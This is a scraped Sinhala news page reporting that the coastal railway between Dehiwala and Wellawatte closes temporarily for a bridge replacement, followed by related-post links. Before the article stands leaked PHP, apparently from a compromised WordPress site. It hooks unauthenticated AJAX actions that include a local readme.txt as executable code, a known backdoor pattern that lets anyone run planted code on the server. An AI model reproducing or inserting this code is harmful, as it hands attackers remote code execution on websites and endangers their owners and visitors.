if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } දෙහිවල-වැල්ලවත්ත දුම්රිය මාර්ගය තාවකාලිකව වැසෙයි - mediahumanrights.lk
mediahumanrights.lk
News

දෙහිවල-වැල්ලවත්ත දුම්රිය මාර්ගය තාවකාලිකව වැසෙයි

මුහුදුබඩ දුම්රිය මාර්ගයේ දෙහිවල සහ වැල්ලවත්ත දුම්රිය ස්ථාන අතර මාර්ගය ලබන 23 වන දා සිට 27 වන දා දක්වා තාවකාලිකව වසා තැබෙන බව දුම්රිය දෙපාර්තමේන්තුව පවසයි.
දුම්රිය ගමනාගමන අධිකාරී විජය සමරසිංහ මහතා සඳහන් කළේ එම දුම්රිය ස්ථාන අතර පිහිටා ඇති පැරණි පාළමක් ඉවත් කර නව පාළමක් ඉඳි කිරීම හේතුවෙන් අදාළ පියවර ගත් බවයි.
ඒ අනුව ලබන 23 වන දා රාත්‍රී 10.00යේ සිට ලබන 27 වන දින පෙරවරු 4.00 දක්වා දෙහිවල හා වැල්ලවත්ත අතර දුම්රිය මාර්ගය වසා තබනු  ඇත.
මේ අතර මාතර, ගාල්ල හා අළුත්ගම සිට පැමිණෙන දුම්රියන් දෙහිවල දුම්රිය ස්ථානය දක්වා ධාවනය වන අතර එම ප්‍රදේශ සඳහා ගමන් ආරම්භය දෙහිවල දුම්රිය ස්ථානයෙන් ආරම්භ කෙරෙයි.
එමෙන්ම කොළඹ කොටුවෙන් ආරම්භ වන දුම්රිය වැල්ලවත්ත දුම්රිය ස්ථානය දක්වා පමණක් අදාළ කාල සීමාව තුළ ධාවනය කරනු ලබන බව ද සදහන්.

Related posts

ත්‍රිරෝද රථ ලියාපදිංචිය අඩුවීමක්-පොදු ප්‍රවාහනයේ සීඝ්‍ර වර්ධනයක්

Shiran Viraj

දැන් තියෙන්නෙ 4G… 5G ආවාම අපි තව වේගයෙන් වැඩ කරනවා…

Shiran Viraj

ලංවිම 2021 වසරට විදුලිය මිළදී ගැනීමට සැරසේ!

Shiran Viraj